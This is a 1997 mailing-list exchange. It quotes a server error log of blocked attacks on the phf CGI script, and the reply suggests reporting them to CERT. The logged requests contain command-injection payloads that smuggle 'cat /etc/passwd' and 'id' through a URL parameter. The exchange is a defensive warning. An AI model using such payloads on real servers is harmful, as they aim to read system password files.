<snip>
/WWW/WWW/ARPA/httpd_1.3/logs>cat error | grep phf
[Sun Mar 23 11:22:39 1997] httpd: access to /cgi-bin/phf?Qname=%0Acat%20/etc/p
swd denied for t6o16p8.telia.com, reason: file not found
[Sun Apr  6 17:37:06 1997] httpd: access to /cgi-bin/phf?Qalias=x%0a/bin/cat%2
etc/passwd denied for wxs7-2.worldaccess.nl, reason: file not found
[Tue Apr  8 15:17:31 1997] httpd: access to /cgi-bin/phf?Qalias=x%0a/bin/cat%2
etc/passwd denied for wxs8-14.worldaccess.nl, reason: file not found
[Thu Apr 17 06:47:50 1997] httpd: access to /cgi-bin/phf?Q=%0aid denied for pc
-slip.ccs-stag.deakin.edu.au, reason: file not found
[Mon Apr 21 15:03:31 1997] httpd: access to /cgi-bin/phf?Qalias=x%0a/bin/cat%2
etc/passwd denied for wxs8-4.worldaccess.nl, reason: file not found
[Wed Apr 23 06:58:00 1997] httpd: access to /cgi-bin/phf?Qname=asd=%0acat%20/e
/passwd denied for wimol2.wimol.ksc.co.th, reason: file not found
[Mon May  5 06:27:41 1997] httpd: access to /cgi-bin/phf?Qalias=x%0a/bin/cat%2
etc/passwd denied for 139.134.243.139, reason: file not found

While I don't know if phf can get to files in other accounts on the 3000(?),
it's still best disabled. Be careful out there.

               -Chris Bartram
</snip>

Chris,

Thank you for warning us about this weakness.

Is there anyone you can send this file fragment to, to let them know that
you have intruders attempting to exploit a well known weakness?
Organizations like CERT and others?

Marshall Medoff, ITA, Inc.
Arlington, Virginia